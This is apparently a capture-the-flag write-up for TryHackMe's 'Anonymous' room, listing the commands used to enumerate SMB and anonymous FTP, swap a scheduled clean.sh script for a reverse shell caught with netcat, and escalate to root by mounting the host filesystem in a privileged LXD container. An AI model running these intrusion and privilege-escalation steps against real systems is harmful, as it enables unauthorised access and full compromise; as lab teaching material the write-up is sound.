Anonymous
Last updated
Room Link: https://tryhackme.com/room/anonymous
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/445 - SMB
Kali
smbclient -L //$VICTIM/There were just two dog pics, probably not interesting.
Kali
mkdir loot
cd loot
smbclient \\\\$VICTIM\\pics
prompt
mget *TCP/21 - FTP
Login using anonymous and no pass
Kali
ftp $VICTIM 21
binary
passive
cd scripts
mget *Initial Shell
There were these 3 files
I modified clean.sh to have a reverse shell back to my kali
Kali #1
nc -lvnp 1337Kali #2
ftp $VICTIM 21
binary
passive
cd scripts
put clean.shAfter a few minutes the script was ran and I had a shell.
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgPrivilege Escalation
Followed this link on lxd privilege escalation
Link: https://www.hackingarticles.in/lxd-privilege-escalation/
Victim
idKali
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.
Victim
cd /tmp
wget http://$KALI/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
